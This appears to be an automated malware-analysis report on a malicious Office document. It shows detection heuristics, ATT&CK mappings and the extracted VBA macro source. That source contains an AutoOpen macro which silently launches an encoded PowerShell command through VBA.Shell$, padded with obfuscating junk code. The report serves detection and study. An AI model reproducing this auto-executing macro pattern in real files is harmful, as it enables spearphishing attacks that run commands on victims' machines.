MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. Heuristics indicate the presence of a Shell() call and PowerShell references within the VBA code, specifically within an AutoOpen macro. This suggests the document is designed to execute arbitrary commands, likely to download and execute a second-stage payload, aligning with the typical behavior of macro-based malware.
Heuristics 8
-
ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
On Error Resume Next VBA.Shell$ "" + "powershell -e YWJjZA==", 0 End Function -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
On Error Resume Next VBA.Shell$ "" + "powershell -e YWJjZA==", 0 End Function -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() MfKEFtN -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7902 bytes |
SHA-256: 161c33eed9ddc2cf24679a6f424a630a4dae0ca7d40fcdf3365c778123dda2f4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub MRfF227()
On Error Resume Next
Do
Select Case pKQixBx
Case 18793868
HrCrIlf = CBool(65 - CSng(vuAl - Round(558) - beAC / CLng(11 * Rnd(171417130))))
yJEO967Y6 = 9203
Case 5
bHmbEY = Int(532772391)
kIUWfo8K = Int(tYFk813D3)
End Select
Dim seH()
ReDim seH(2)
seH(0) = 264849359
seH(1) = 33098296
Select Case CZk
Case 346281819
ZIj = Hex(43848039 - ChrW(dbS) / 7 * ZveT8T2H9)
CreK9UY6 = Sqr(kORo485V8 + CByte(365104055 + Round(9041 / Log(8) / TKl - ChrW(51))) / KBoC6f220 + JSvX78At)
kHgLw2 = Int(9434)
Case 6
kLF = Fix(vaKp7)
LwzTji = CBool(eiug7)
zvbH5M = jUNFrPs
Case 2986
YMRS = 29
eXG = Round(232952633)
OgyR13aJ = Hex(1)
End Select
Set aGj = MeMG01
Loop Until TMGC15d <> ptHmBrqQE
Do
oMQY = Sin(406004041 - Chr(fbIQV / CByte(7 / hyGB) - 3 * Round(5 * BteDKgp)) - nRQrs3S + CDate(467260834 + ChrB(bUHdH)))
qPxG = fbeZx1C + 536281499
hNlToXE0 = (3276 / CStr(enjV87yY - Rnd(9)) * 52 / CInt(985 + Hex(1 * 21) / 5 * CInt(hDQS - CByte(598))) * Iblb0 - Chr(CcX))
Do
BSCB5965 = CDbl(96)
Loop Until KAjc8 <= DOc
KIlFg1 = (yuTRu0wQ6 / PlGJ5x6T - (560 - ChrB(teIy) - NRSdnP + CByte(4680) / (Rqm * Tan(90) * (9669 + CLng(JDmPeCwhZ - Int(jWvF2)) - RNgDS4h5y * 3))))
Loop Until yQIY8htto Or 5
rjoG1P = MmD - oHh
End Sub
Sub VXnWm(JRmm4h)
On Error Resume Next
If hfuM8 Or tHTPP Then
Do
vswXP9rWb = gbej4mY7n + Int(8105) / jkLO * Hex(KKG / Atn(9)) / RhT - Fix(670)
Loop Until lmHoU0o Or RVqCq4Do7
If nLFz Eqv hkUu201R Then
LTl = CBool(250089612)
End If
ElseIf YQPf Xor EbhQ62 Then
Do While GrhR And qjnU6q
ygJXK = 512374437
Loop
Vyo = (IaG + CDate(8 / RwVB26 - jttkjmQ / Sqr(onOb9Gx)) + KBvgz - ChrB(71) - cgtv45 + 96 + JYmphtI69 / sIm + 5 - Oct(bJhbnw0c / CStr(TWTb7B) * 70 - CDate(IlBx)) * 30 * Oct(eOjzJ54ai))
End If
Select Case XZZT9z
Case 918
KfOAFH6Iu = CDbl(284685011)
GBALw9E10 = CLng(305749864)
zhqEWH = Hex(3424 - ajwHo0T1)
Case 9
taOh = ZBluh
bXIl9a = QrMCX589Y
xPCU66c = CByte(6408)
End Select
End Sub
Sub autoopen()
MfKEFtN
End Sub
Sub fduN(OJff)
On Error Resume Next
Do While FLYI7G263 >= 18
qBvlX = MdKK - 21976223
Iavn3u07a = KbVR49F * 189328296
Loop
While oXQibRnr Xor kBlOH01b
Do While EMju8w <> EfNF7
KUa = Atn(80 / Tan(23 - DqU) - CrEK4 - 8951)
Loop
VxlOb167 = tvst2V94 / CLng(4 * ChrB(adNb)) + 448636581 - Tan(94 + Cos(245842808)) / 356 - Round(xSz) / yWxu52I + CDbl(GBFV4aDL) - 1229 * Sin(425 + Log(304096732)) / (JxnL2 / CDbl(1 + Round(3) / hxTR * Tan(61 + CLng(IvOq016W0 + Atn(cAZ)) * 242025946 - Atn(JCdi337))))
hFNAAo9 = ChrW(cyp + CStr(AwfpV) - kTkBp86 / 6)
Do
VGBC = KxJJnEgZ4 - Rnd(sozb - Oct(HZMd5m2e * CLng(432728309 * CLng(VoNx16))) - Wszwp * 658) * 870 / 193690625 * fXAip91 + Fix(fltHA11H + 701)
Loop Until ePZsCbwig <> 19
While Fsp Or 732
VXQK0 = 92 + Cos(yoEnGnPp / Round(bSr / CStr(VIoP3r2) / 97582935 * LGNO9H) + 533087076 - Chr(ysid7)) * (1 / 890 / 15323515 * CByte(OXqd5) * 186 + 608 + IquI637K / 13 / (9 + mfmt8e7))
Wend
While tjoo6 >= feJk024u
QRuNK9z = (3033 - CDate(322) / 149 / DAOqsNP99) + (UzzoAV8 / Atn(63) - (bGWa2s4T - CDate(5)))
Wend
Wend
ySA = CBool(8)
End Sub
Sub OJcf71T61()
On Error Resume Next
Do While QZciS And 7
For Each skqku3N In UQN
udcBgS = mHuP9FPN8 - CLng(iCip) / QCBd + CDbl(71816958) + 8470 + CLng(UmmI1 - vfjNiv3) - jyJi4 + Log(HeqUMrT4W) + IjsS + Atn(dxRX0g15)
Next
rPXf1I4 = CrlE
BHlI544g8 = RSeD
mgokdB2 = 486058022 * 295585723
Loop
If owYKsh4eZ < UwvHyr Then
While jxYMb70L And XhNmm14x
ltQp = OhcL7Y1D4 - Sin(NKYaXhjJ * Rnd(4) / eoDSNj09 - Hex(fnVH)) + (152736399 + CDbl(8601))
Wend
CPdr5V8M = cBUx0BBw4 + GAYw02J
ElseIf EUha Xor NhTm3C Then
Set rJIa = AnmH3J646
For Each vmjYlP0 In PMSU1
tJiXR = (68 - ChrB(514168117 + Sgn(609 + Int(538 * ChrW(368339161 * CStr(LUzBF2I1B))) * 639 * 528157508) - mUCMF63Y * Round(688)) + (6 - CBool(7260 / Int(378) + dzbB4M / slXZ1) - rxdi - Round(5) / (zmXu + 65)))
Next
End If
End Sub
Public Function MfKEFtN()
On Error Resume Next
VBA.Shell$ "" + "powershell -e YWJjZA==", 0
End Function
Sub YqkwQw2()
On Error Resume Next
Do
Do
zvBF82iy = DZHBB - 70 * YEAv + Sgn(WBGU2E11)
Loop Until uhFb < uNtR965
While nJtGlp3 >= jTklnfsL
LNaVi2 = 521 / sfWck / pceZh415 / ChrW(595 / CInt(2)) - 5 * Round(XZBQf7) - 6800 - CLng(gOjj9b062 + BmKi303D) * 60 / Int(MNQM7744) + (8059 / Tan(XzUIzK6x) / YihiPs6 * CDbl(20776914 * CDate(514113094) + 1 / Round(270060603)))
Wend
veIfF = 815 * Round(iCZNo) + QXTX / 112188161 / (THVDarIU * Sin(GZT))
For Each POPxv4S2 In wOGJ7lj
AHGz = PlXC * Round(455799610) - 2905 / gSDy + (bsxt178U / Round(zQad - mXBXV8) / 89442276 - 657 / (204367578 / CInt(viTv5 * 304) - ViVY4P50 - Fix(313922968)))
Next
rwbd = 240248942 / jcHn5
Loop Until iEmV69 <> iFUQg78
DlNc5422 = (27 - ydEY - RMq / CBool(CMKu4) - (aeKY28n9 / CByte(rRI) + (RcqRp - CBool(LfRI08C8z - ChrB(223481334) * JHK / Sgn(25 - CLng(69))) + (vtuB2oY + ChrW(2935 + CInt(9) + UzjQ * CInt(181911309)) * 665 / Rnd(7)))))
While KWhY1 >= 21
For pCIET = ElOk0BC64 To xEjX07Q
wAGR9 = Cpvr042V / Cos(MqvS7A29 / fpQqDXHF3 - 81 / Atn(1)) / lgbyr3U - Rnd(7) * WFpZx5 * Log(1596 * fqRB)
Next
If PupH01uC <= 14 Then
IGgxO = 807
End If
For BIT = 2418 To 7677
dlkJc7 = zgn * Hex(7745) - 301618901 + Hex(vOfoT5uu) / oOHQ * Oct(89 - Atn(RVuOj1 - Fix(72))) - 68 / Log(SfZnP6) * (kQlG / CStr(4375) / (FUa / CDbl(iwVC) + EebH1l1l2 / Chr(2)))
Next
Wend
End Sub
Sub hwrOJ4(Byv)
On Error Resume Next
If EfvU0ypm >= ceWj6u7 Then
If vtmo > 17 Then
ayk = CSng(kru)
End If
Select Case wjcxxjA
Case 6919
MlVN72x = 326
Ekix12Yh1 = CSng(8)
WbR = Sqr(dufvSoDR)
Case 3
UgBS37 = eaji
xHJiODDFe = CLng(WKK)
hfLIkqA = CByte(15)
End Select
End If
If XLzX0B8 = UvrR60 Then
Select Case ijHdO
Case 867
OhhU9nF = KWbSS1
iaAoX6 = CStr(4)
EtW = Fix(5101 / Round(wnjuo6))
Case 153
eUkB = 1665
VuMG847 = Cos(438249070 + 6)
yWwz5 = Hex(MDiS5K)
Case 40
yOAWD5pS = HCzzWSso
Wio = Sqr(330)
uwC = 3
End Select
While pPt < 6186
XMuq0 = DQz / Round(PzZb6) - PkLI468jd + PjMK5 / 154 / Hex(ucUOAwz0w) - nWW / Fix(TMuj3) / OrpX2 * Sgn(moU) * (ABxD - Atn(4899) - 136094830 * Log(cFLK86e01))
Wend
ElseIf IAV <= 66679749 Then
For Each Qrcxt9Li3 In POgy2N7G
lBeh = 9006 - Fix(brMn9v800) + 45 + Log(QkVr) * sNET41v + CBool(pFfH)
Next
While mPBXlK465 Xor 26
uCDq = jOYl / sUBFo05 - hNZ + Chr(93) - 420140798 - CLng(fVWISB)
Wend
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.